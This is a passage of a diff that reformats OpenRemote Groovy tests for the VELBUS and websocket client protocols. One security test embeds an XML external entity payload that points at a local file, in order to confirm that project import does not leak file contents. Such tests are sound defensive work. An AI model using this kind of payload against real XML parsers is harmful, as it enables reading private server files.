-        AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
-
-        then: "the correct number of assets should be returned and all should have IDs"
-        assert assets != null
-        assert assets.length == 13
-        assert assets.each {
-            !TextUtil.isNullOrEmpty(it.asset.id) &&
-                !TextUtil.isNullOrEmpty(it.asset.getName()) &&
-                !it.asset.getAttributes().isEmpty() &&
-                it.asset.getAttributes().values().every {attr ->
-                    attr.getMetaValue(AGENT_LINK).map{
-                        ValueUtil.getValue(it, VelbusAgentLink.class)
-                                .map({agentLink -> agentLink.id == agent.id && agentLink.deviceAddress.isPresent() && agentLink.deviceValueLink.isPresent()})
-                                .orElse(false)
-                    }.orElse(true)
-                }
-        }
-
-        and: "a given asset should have the correct attributes (VMBGPOD)"
-        def asset = assets.find {it.asset.name == "VMBGPOD"}
-        assert asset != null
-        assert asset.asset.getAttributes().size() == 305
-        def memoTextAttribute = asset.asset.getAttributes().values().find {it.getMetaValue(AGENT_LINK).map{(it as VelbusAgentLink).deviceValueLink.orElse(null) == "MEMO_TEXT"}.orElse(false)}
-        assert memoTextAttribute != null
-        assert memoTextAttribute.getMetaValue(AGENT_LINK).flatMap(){(it as VelbusAgentLink).deviceAddress}.orElse(null) == 24
-
-        and: "all imported assets should be fully linked"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 1163
-        }
-
-        when: "agent and imported assets are removed"
-        def ids = []
-        ids.addAll(Arrays.stream(assets).map{it.asset.id}.collect(Collectors.toList()))
-        ids.add(agent.id)
-        assetStorageService.delete(ids)
-
-        then: "the agent and assets should not exist"
-        conditions.eventually {
-            assert assetStorageService.findNames(ids as String[]).isEmpty()
-        }
-
-        cleanup: "remove agent and imported assets"
-        if (agent != null && assets != null) {
-            ids = []
-            ids.addAll(Arrays.stream(assets).map{it.asset.id}.collect(Collectors.toList()))
-            ids.add(agent.id)
-            assetStorageService.delete(ids)
-        }
+    expect: "the system should settle down"
+    conditions.eventually {
+      assert noEventProcessedIn(assetProcessingService, 300)
     }
 
-    def "Check VELBUS import does not resolve external entities from local files"() {
+    when: "a VELBUS agent is created"
+    def agent = new MockVelbusAgent("VELBUS")
+            .setRealm(MASTER_REALM)
+    agent = assetStorageService.merge(agent)
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 60, delay: 0.5)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def leakedContent = "velbus-xxe-${UUID.randomUUID()}"
-        def secretFile = File.createTempFile("velbus-xxe-", ".txt")
-        secretFile.text = leakedContent
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
+    }
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    when: "discovery is requested with a VELBUS project file"
+    def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
+    AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
+
+    then: "the correct number of assets should be returned and all should have IDs"
+    assert assets != null
+    assert assets.length == 13
+    assert assets.each {
+      !TextUtil.isNullOrEmpty(it.asset.id) &&
+      !TextUtil.isNullOrEmpty(it.asset.getName()) &&
+      !it.asset.getAttributes().isEmpty() &&
+      it.asset.getAttributes().values().every {attr ->
+        attr.getMetaValue(AGENT_LINK).map{
+          ValueUtil.getValue(it, VelbusAgentLink.class)
+          .map({agentLink ->
+            agentLink.id == agent.id && agentLink.deviceAddress.isPresent() && agentLink.deviceValueLink.isPresent()
+          })
+          .orElse(false)
+        }.orElse(true)
+      }
+    }
+
+    and: "a given asset should have the correct attributes (VMBGPOD)"
+    def asset = assets.find {it.asset.name == "VMBGPOD"}
+    assert asset != null
+    assert asset.asset.getAttributes().size() == 305
+    def memoTextAttribute = asset.asset.getAttributes().values().find {
+      it.getMetaValue(AGENT_LINK).map{
+        (it as VelbusAgentLink).deviceValueLink.orElse(null) == "MEMO_TEXT"
+      }.orElse(false)
+    }
+    assert memoTextAttribute != null
+    assert memoTextAttribute.getMetaValue(AGENT_LINK).flatMap(){
+      (it as VelbusAgentLink).deviceAddress
+    }.orElse(null) == 24
+
+    and: "all imported assets should be fully linked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id).linkedAttributes.size() == 1163
+    }
+
+    when: "agent and imported assets are removed"
+    def ids = []
+    ids.addAll(Arrays.stream(assets).map{it.asset.id}.collect(Collectors.toList()))
+    ids.add(agent.id)
+    assetStorageService.delete(ids)
+
+    then: "the agent and assets should not exist"
+    conditions.eventually {
+      assert assetStorageService.findNames(ids as String[]).isEmpty()
+    }
+
+    cleanup: "remove agent and imported assets"
+    if (agent != null && assets != null) {
+      ids = []
+      ids.addAll(Arrays.stream(assets).map{it.asset.id}.collect(Collectors.toList()))
+      ids.add(agent.id)
+      assetStorageService.delete(ids)
+    }
+  }
+
+  def "Check VELBUS import does not resolve external entities from local files"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 60, delay: 0.5)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def leakedContent = "velbus-xxe-${UUID.randomUUID()}"
+    def secretFile = File.createTempFile("velbus-xxe-", ".txt")
+    secretFile.text = leakedContent
+
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        and: "a VELBUS project file with an external entity in the imported caption"
-        def velbusProjectFile = """<!DOCTYPE Project [
+    and: "a VELBUS project file with an external entity in the imported caption"
+    def velbusProjectFile = """<!DOCTYPE Project [
 <!ENTITY xxe SYSTEM "${secretFile.toURI()}">
 ]>
 <Project>
@@ -264,95 +274,95 @@ class VelbusProtocolTest extends Specification implements ManagerContainerTrait 
 </Project>
 """
 
-        when: "a VELBUS agent is created"
-        def agent = new MockVelbusAgent("VELBUS")
+    when: "a VELBUS agent is created"
+    def agent = new MockVelbusAgent("VELBUS")
             .setRealm(MASTER_REALM)
-        agent = assetStorageService.merge(agent)
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
-        }
-
-        when: "the crafted project file is imported"
-        def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
-        AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
-
-        then: "the external entity is not expanded into the imported asset name or persisted"
-        assert leakedContent.length() < 1023
-        assert assets != null
-        assert assets.length == 0
-
-        cleanup: "remove the agent, imported asset and temp file"
-        secretFile?.delete()
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
     }
 
-    def "Protocol asset import requires asset write permission"() {
+    when: "the crafted project file is imported"
+    def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
+    AssetTreeNode[] assets = agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 60, delay: 0.5)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    then: "the external entity is not expanded into the imported asset name or persisted"
+    assert leakedContent.length() < 1023
+    assert assets != null
+    assert assets.length == 0
 
-        and: "a VELBUS project file"
-        def velbusProjectFileResource = getClass().getResourceAsStream(
-                "/org/openremote/test/protocol/velbus/VelbusProject.vlp"
-        )
-        def velbusProjectFile = IOUtils.toString(velbusProjectFileResource, "UTF-8")
-
-        and: "a master realm user with read-only asset permission"
-        keycloakTestSetup.createUser(
-                MASTER_REALM,
-                "agentimportreadonly",
-                "agentimportreadonly",
-                "Agent Import",
-                "Read Only",
-                "agentimportreadonly@openremote.local",
-                true,
-                [ClientRole.READ_ASSETS] as ClientRole[]
-        )
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "agentimportreadonly",
-                "agentimportreadonly"
-        )
-
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
-
-        when: "a VELBUS agent is created"
-        def agent = new MockVelbusAgent("VELBUS")
-                .setRealm(MASTER_REALM)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
-        }
-
-        when: "the read-only user imports assets through the agent endpoint"
-        def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
-        agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
-
-        then: "asset import should require write permission"
-        jakarta.ws.rs.ForbiddenException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        cleanup: "remove the agent"
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
+    cleanup: "remove the agent, imported asset and temp file"
+    secretFile?.delete()
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
     }
+  }
+
+  def "Protocol asset import requires asset write permission"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 60, delay: 0.5)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+
+    and: "a VELBUS project file"
+    def velbusProjectFileResource = getClass().getResourceAsStream(
+            "/org/openremote/test/protocol/velbus/VelbusProject.vlp"
+            )
+    def velbusProjectFile = IOUtils.toString(velbusProjectFileResource, "UTF-8")
+
+    and: "a master realm user with read-only asset permission"
+    keycloakTestSetup.createUser(
+            MASTER_REALM,
+            "agentimportreadonly",
+            "agentimportreadonly",
+            "Agent Import",
+            "Read Only",
+            "agentimportreadonly@openremote.local",
+            true,
+            [ClientRole.READ_ASSETS] as ClientRole[]
+            )
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "agentimportreadonly",
+            "agentimportreadonly"
+            )
+
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+
+    when: "a VELBUS agent is created"
+    def agent = new MockVelbusAgent("VELBUS")
+            .setRealm(MASTER_REALM)
+    agent = assetStorageService.merge(agent)
+
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
+    }
+
+    when: "the read-only user imports assets through the agent endpoint"
+    def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
+    agentResource.doProtocolAssetImport(null, agent.getId(), MASTER_REALM, fileInfo)
+
+    then: "asset import should require write permission"
+    jakarta.ws.rs.ForbiddenException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    cleanup: "remove the agent"
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/websocket/WebsocketClientProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/websocket/WebsocketClientProtocolTest.groovy
@@ -65,254 +65,256 @@ import static org.openremote.model.value.ValueType.NUMBER
 
 class WebsocketClientProtocolTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    def mockServer = new ClientRequestFilter() {
+  @Shared
+  def mockServer = new ClientRequestFilter() {
 
-        private boolean agentSubscriptionDone = false
-        private boolean attribute1SubscriptionDone = false
-        private boolean attribute2SubscriptionDone = false
-        private boolean finished = false
+    private boolean agentSubscriptionDone = false
+    private boolean attribute1SubscriptionDone = false
+    private boolean attribute2SubscriptionDone = false
+    private boolean finished = false
 
-        @Override
-        void filter(ClientRequestContext requestContext) throws IOException {
-            if (finished) {
-                return
-            }
+    @Override
+    void filter(ClientRequestContext requestContext) throws IOException {
+      if (finished) {
+        return
+      }
 
-            def requestUri = requestContext.uri
-            def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
+      def requestUri = requestContext.uri
+      def requestPath = requestUri.scheme + "://" + requestUri.host + requestUri.path
 
-           if (!requestPath.contains("mockapi")) {
+      if (!requestPath.contains("mockapi")) {
+        return
+      }
+
+      // Check auth header is present
+      def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
+      if (authHeader == null || authHeader.length() < 8) {
+        requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
+        return
+      }
+
+      switch (requestPath) {
+
+        case "https://mockapi/assets":
+          if (requestContext.method == HttpMethod.POST
+          && requestContext.getHeaderString("header1") == "header1Value1"
+          && requestContext.getHeaderString("header2") == "header2Value1,header2Value2"
+          && requestContext.getHeaderString("Content-type") == MediaType.APPLICATION_JSON) {
+
+            String bodyStr = (String)requestContext.getEntity()
+            AssetQuery assetQuery = ValueUtil.JSON.readValue(bodyStr, AssetQuery.class)
+            if (assetQuery != null && assetQuery.ids != null && assetQuery.ids.size() == 1) {
+              agentSubscriptionDone = true
+              requestContext.abortWith(Response.ok().build())
               return
-           }
-
-            // Check auth header is present
-            def authHeader = requestContext.getHeaderString(HttpHeaders.AUTHORIZATION)
-            if (authHeader == null || authHeader.length() < 8) {
-                requestContext.abortWith(Response.status(Response.Status.UNAUTHORIZED).build())
-                return
             }
+          }
+          break
+        case "https://mockapi/targetTemperature":
+          attribute1SubscriptionDone = true
+          requestContext.abortWith(Response.ok().build())
+          break
+        case "https://mockapi/co2Level":
+          attribute2SubscriptionDone = true
+          requestContext.abortWith(Response.ok().build())
+          break
+      }
 
-            switch (requestPath) {
-
-                case "https://mockapi/assets":
-                    if (requestContext.method == HttpMethod.POST
-                        && requestContext.getHeaderString("header1") == "header1Value1"
-                        && requestContext.getHeaderString("header2") == "header2Value1,header2Value2"
-                        && requestContext.getHeaderString("Content-type") == MediaType.APPLICATION_JSON) {
-
-                        String bodyStr = (String)requestContext.getEntity()
-                        AssetQuery assetQuery = ValueUtil.JSON.readValue(bodyStr, AssetQuery.class)
-                        if (assetQuery != null && assetQuery.ids != null && assetQuery.ids.size() == 1) {
-                            agentSubscriptionDone = true
-                            requestContext.abortWith(Response.ok().build())
-                            return
-                        }
-                    }
-                    break
-                case "https://mockapi/targetTemperature":
-                    attribute1SubscriptionDone = true
-                    requestContext.abortWith(Response.ok().build())
-                    break
-                case "https://mockapi/co2Level":
-                    attribute2SubscriptionDone = true
-                    requestContext.abortWith(Response.ok().build())
-                    break
-            }
-
-            requestContext.abortWith(Response.serverError().build())
-        }
+      requestContext.abortWith(Response.serverError().build())
     }
+  }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check websocket client protocol and linked attribute deployment"() {
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check websocket client protocol and linked attribute deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def agentService = container.getService(AgentService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def clientEventService = container.getService(ClientEventService.class)
+    and: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def agentService = container.getService(AgentService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def clientEventService = container.getService(ClientEventService.class)
 
-        and: "the built in JAX-RS client is injected with the mock server filter"
-        WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
+    and: "the built in JAX-RS client is injected with the mock server filter"
+    WebTargetBuilder.client.register(mockServer, Integer.MAX_VALUE)
 
-        and: "a Websocket client agent is created to connect to this tests manager"
-        def agent = new WebsocketAgent("Test agent")
+    and: "a Websocket client agent is created to connect to this tests manager"
+    def agent = new WebsocketAgent("Test agent")
             .setRealm(Constants.MASTER_REALM)
             .setConnectURI("ws://127.0.0.1:$serverPort/websocket/events?Realm=master")
             .setOAuthGrant(new OAuthPasswordGrant("http://127.0.0.1:$serverPort/auth/realms/master/protocol/openid-connect/token",
-                KEYCLOAK_CLIENT_ID,
-                null,
-                null,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)))
+            KEYCLOAK_CLIENT_ID,
+            null,
+            null,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)))
             .setConnectSubscriptions([
-                new WebsocketSubscriptionImpl().body(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX + ValueUtil.asJSON(
-                    new EventSubscription(
-                        AttributeEvent.class,
-                        new AssetFilter<AttributeEvent>().setAssetIds(managerTestSetup.apartment1LivingroomId),
-                        "1")).orElse(null)),
-                new WebsocketHTTPSubscription()
-                    .contentType(MediaType.APPLICATION_JSON)
-                    .method(WebsocketHTTPSubscription.Method.POST)
-                    .headers(new ValueType.MultivaluedStringMap([
-                        "header1" : ["header1Value1"],
-                        "header2" : ["header2Value1", "header2Value2"]
-                    ]))
-                    .uri("https://mockapi/assets")
-                    .body(
-                        ValueUtil.asJSON(new AssetQuery().ids(managerTestSetup.apartment1LivingroomId)).orElse(null)
-                    )
-                ] as WebsocketSubscription[]
+              new WebsocketSubscriptionImpl().body(EventSubscription.SUBSCRIBE_MESSAGE_PREFIX + ValueUtil.asJSON(
+                      new EventSubscription(
+                              AttributeEvent.class,
+                              new AssetFilter<AttributeEvent>().setAssetIds(managerTestSetup.apartment1LivingroomId),
+                              "1")).orElse(null)),
+              new WebsocketHTTPSubscription()
+              .contentType(MediaType.APPLICATION_JSON)
+              .method(WebsocketHTTPSubscription.Method.POST)
+              .headers(new ValueType.MultivaluedStringMap([
+                "header1" : ["header1Value1"],
+                "header2" : ["header2Value1", "header2Value2"]
+              ]))
+              .uri("https://mockapi/assets")
+              .body(
+                      ValueUtil.asJSON(new AssetQuery().ids(managerTestSetup.apartment1LivingroomId)).orElse(null)
+                      )
+            ] as WebsocketSubscription[]
             )
 
-        when: "the agent is added to the asset service"
-        agent = assetStorageService.merge(agent)
+    when: "the agent is added to the asset service"
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol should authenticate and the agent status should become CONNECTED"
-        conditions.eventually {
-            agent = assetStorageService.find(agent.id, Agent.class)
-            assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    then: "the protocol should authenticate and the agent status should become CONNECTED"
+    conditions.eventually {
+      agent = assetStorageService.find(agent.id, Agent.class)
+      assert agent.getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
 
-        and: "the subscriptions should have been executed"
-        conditions.eventually {
-            assert mockServer.agentSubscriptionDone
-        }
+    and: "the subscriptions should have been executed"
+    conditions.eventually {
+      assert mockServer.agentSubscriptionDone
+    }
 
-        when: "an asset is created with attributes linked to the agent"
-        def asset = new ThingAsset("Test Asset")
+    when: "an asset is created with attributes linked to the agent"
+    def asset = new ThingAsset("Test Asset")
             .setParent(agent)
             .addOrReplaceAttributes(
-                // write attribute value
-                new Attribute<>("readWriteTargetTemp", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new WebsocketAgentLink(agent.id)
-                            .setWriteValue(SharedEvent.MESSAGE_PREFIX +
-                                ValueUtil.asJSON(new AttributeEvent(
-                                    managerTestSetup.apartment1LivingroomId,
-                                    "targetTemperature",
-                                    0.12345))
-                                    .orElse(ValueUtil.NULL_LITERAL)
-                                        .replace("0.12345", "%VALUE%")
-                            )
-                        .setMessageMatchFilters(
+            // write attribute value
+            new Attribute<>("readWriteTargetTemp", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new WebsocketAgentLink(agent.id)
+                    .setWriteValue(SharedEvent.MESSAGE_PREFIX +
+                    ValueUtil.asJSON(new AttributeEvent(
+                            managerTestSetup.apartment1LivingroomId,
+                            "targetTemperature",
+                            0.12345))
+                    .orElse(ValueUtil.NULL_LITERAL)
+                    .replace("0.12345", "%VALUE%")
+                    )
+                    .setMessageMatchFilters(
                             [
-                                new RegexValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX + "(.*)", true, false).setMatchGroup(1),
-                                new JsonPathFilter("\$..ref.name", true, false)
+                              new RegexValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX + "(.*)", true, false).setMatchGroup(1),
+                              new JsonPathFilter("\$..ref.name", true, false)
                             ] as ValueFilter[]
-                        )
-                        .setMessageMatchPredicate(
+                            )
+                    .setMessageMatchPredicate(
                             new StringPredicate("targetTemperature")
-                        )
-                        .setValueFilters(
+                            )
+                    .setValueFilters(
                             [
-                                new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
-                                new JsonPathFilter("\$..events[?(@.ref.name == \"targetTemperature\")].value", true, false)
+                              new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
+                              new JsonPathFilter("\$..events[?(@.ref.name == \"targetTemperature\")].value", true, false)
                             ] as ValueFilter[]
-                        )
-                        .setWebsocketSubscriptions(
+                            )
+                    .setWebsocketSubscriptions(
                             [
-                                new WebsocketSubscriptionImpl().body(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(
-                                    new ReadAttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature")
-                                ).orElse(null)),
-                                new WebsocketHTTPSubscription()
-                                    .contentType(MediaType.APPLICATION_JSON)
-                                    .method(WebsocketHTTPSubscription.Method.GET)
-                                    .uri("https://mockapi/targetTemperature")
+                              new WebsocketSubscriptionImpl().body(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(
+                                      new ReadAttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature")
+                                      ).orElse(null)),
+                              new WebsocketHTTPSubscription()
+                              .contentType(MediaType.APPLICATION_JSON)
+                              .method(WebsocketHTTPSubscription.Method.GET)
+                              .uri("https://mockapi/targetTemperature")
                             ] as WebsocketSubscription[]
-                        ))
+                            ))
                     ),
-                new Attribute<>("readCo2Level", NUMBER)
-                    .addMeta(
-                        new MetaItem<>(AGENT_LINK, new WebsocketAgentLink(agent.id)
-                            .setMessageMatchFilters(
-                                [
-                                    new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
-                                    new JsonPathFilter("\$..ref.name", true, false)
-                                ] as ValueFilter[]
+            new Attribute<>("readCo2Level", NUMBER)
+            .addMeta(
+                    new MetaItem<>(AGENT_LINK, new WebsocketAgentLink(agent.id)
+                    .setMessageMatchFilters(
+                            [
+                              new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
+                              new JsonPathFilter("\$..ref.name", true, false)
+                            ] as ValueFilter[]
                             )
-                            .setMessageMatchPredicate(
-                                new StringPredicate("co2Level")
+                    .setMessageMatchPredicate(
+                            new StringPredicate("co2Level")
                             )
-                            .setValueFilters(
-                                [
-                                    new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
-                                    new JsonPathFilter("\$..events[?(@.ref.name == \"co2Level\")].value", true, false),
-                                ] as ValueFilter[]
+                    .setValueFilters(
+                            [
+                              new SubStringValueFilter(TriggeredEventSubscription.MESSAGE_PREFIX.length()),
+                              new JsonPathFilter("\$..events[?(@.ref.name == \"co2Level\")].value", true, false),
+                            ] as ValueFilter[]
                             )
-                            .setWebsocketSubscriptions(
-                                [
-                                    new WebsocketSubscriptionImpl().body(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(
-                                        new ReadAttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level")
-                                    ).orElse(null)),
-                                    new WebsocketHTTPSubscription()
-                                        .contentType(MediaType.APPLICATION_JSON)
-                                        .method(WebsocketHTTPSubscription.Method.GET)
-                                        .uri("https://mockapi/co2Level")
-                                ] as WebsocketSubscription[]
+                    .setWebsocketSubscriptions(
+                            [
+                              new WebsocketSubscriptionImpl().body(SharedEvent.MESSAGE_PREFIX + ValueUtil.asJSON(
+                                      new ReadAttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level")
+                                      ).orElse(null)),
+                              new WebsocketHTTPSubscription()
+                              .contentType(MediaType.APPLICATION_JSON)
+                              .method(WebsocketHTTPSubscription.Method.GET)
+                              .uri("https://mockapi/co2Level")
+                            ] as WebsocketSubscription[]
                             ))
                     )
-        )
+            )
 
-        and: "the asset is merged into the asset service"
-        asset = assetStorageService.merge(asset)
+    and: "the asset is merged into the asset service"
+    asset = assetStorageService.merge(asset)
 
-        then: "the attribute websocket subscriptions should have been executed"
-        conditions.eventually {
-            assert mockServer.attribute1SubscriptionDone
-            assert mockServer.attribute2SubscriptionDone
-        }
+    then: "the attribute websocket subscriptions should have been executed"
+    conditions.eventually {
+      assert mockServer.attribute1SubscriptionDone
+      assert mockServer.attribute2SubscriptionDone
+    }
 
-        when: "the source attribute are updated"
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 99d))
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level", 50d))
+    when: "the source attribute are updated"
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "targetTemperature", 99d))
+    ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(new AttributeEvent(managerTestSetup.apartment1LivingroomId, "co2Level", 50d))
 
-        then: "the values should be stored in the database"
-        conditions.eventually {
-            def livingRoom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
-            assert livingRoom != null
-            assert livingRoom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 99d
-            assert livingRoom.getAttribute("co2Level").flatMap{it.value}.orElse(0i) == 50i
-        }
+    then: "the values should be stored in the database"
+    conditions.eventually {
+      def livingRoom = assetStorageService.find(managerTestSetup.apartment1LivingroomId)
+      assert livingRoom != null
+      assert livingRoom.getAttribute("targetTemperature").flatMap{it.value}.orElse(0d) == 99d
+      assert livingRoom.getAttribute("co2Level").flatMap{it.value}.orElse(0i) == 50i
+    }
 
-        then: "the linked attributes should also have the updated values of the subscribed attributes"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("readCo2Level").get().getValue().orElse(null) == 50d
-            assert asset.getAttribute("readWriteTargetTemp").get().getValue().orElse(null) == 99d
-        }
+    then: "the linked attributes should also have the updated values of the subscribed attributes"
+    conditions.eventually {
+      asset = assetStorageService.find(asset.getId(), true)
+      assert asset.getAttribute("readCo2Level").get().getValue().orElse(null) == 50d
+      assert asset.getAttribute("readWriteTargetTemp").get().getValue().orElse(null) == 99d
+    }
 
-        when: "a linked attribute value is updated"
-        def attributeEvent = new AttributeEvent(asset.id,
+    when: "a linked attribute value is updated"
+    def attributeEvent = new AttributeEvent(asset.id,
             "readWriteTargetTemp",
             19.5)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
 
-        then: "the linked targetTemperature attribute should contain this written value (it should have been written to the target temp attribute and then read back again)"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("readWriteTargetTemp").flatMap{it.getValue()}.orElse(null) == 19.5d
-        }
-
-        when: "the co2level changes"
-        def co2LevelIncrement = new AttributeEvent(
-            managerTestSetup.apartment1LivingroomId, "co2Level", 600
-        )
-        ((SimulatorProtocol)agentService.getProtocolInstance(managerTestSetup.apartment1ServiceAgentId)).updateSensor(co2LevelIncrement)
-
-        then: "the linked co2Level attribute should get the new value"
-        conditions.eventually {
-            asset = assetStorageService.find(asset.getId(), true)
-            assert asset.getAttribute("readCo2Level").flatMap{it.getValue()}.orElse(null) == 600d
-        }
-
-        cleanup: "disable mock filter"
-        mockServer.finished = true
